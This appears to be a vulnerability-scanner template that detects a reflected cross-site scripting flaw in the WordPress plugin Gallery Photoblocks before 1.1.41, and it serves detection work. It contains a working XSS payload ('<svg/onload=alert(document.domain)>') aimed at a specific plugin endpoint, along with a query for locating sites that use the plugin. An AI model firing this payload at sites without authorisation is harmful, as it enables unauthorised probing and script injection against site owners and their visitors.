id: photoblocks-grid-gallery-xss

info:
  name: Gallery Photoblocks < 1.1.41 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Reflected Cross-Site Scripting (XSS) is a type of web vulnerability where an attacker injects malicious scripts into a website, and the injected code gets reflected back to the user's browser, executing the script in the context of the vulnerable website.
  remediation: Fixed in version 1.1.41
  reference:
    - https://plugins.trac.wordpress.org/changeset/2117972
    - https://wpscan.com/vulnerability/5c57e78a-97b9-4e23-8935-e4c9d806c89d
    - https://wordpress.org/plugins/photoblocks-grid-gallery/
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/"
  tags: wordpress,wpscan,photoblocks,wp-plugin,wp,xss

http:
  - raw:
      - |
        GET /wp-content/plugins/photoblocks-grid-gallery/admin/partials/photoblocks-edit.php?id=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "<svg/onload=alert(document.domain)>")'
          - 'contains(body, "PhotoBlocks")'
        condition: and

# digest: 4a0a00473045022100e25d0c3f2b8523d249ea8a1fcf6aa3cb5352dde3741a6d1d98af45fbc385795002206e778ddccd1913d8f33ffe208083c9d0913d0952757b3d3e7f3a52afd8e89deb:922c64590222798bb761d5b6d8e72950
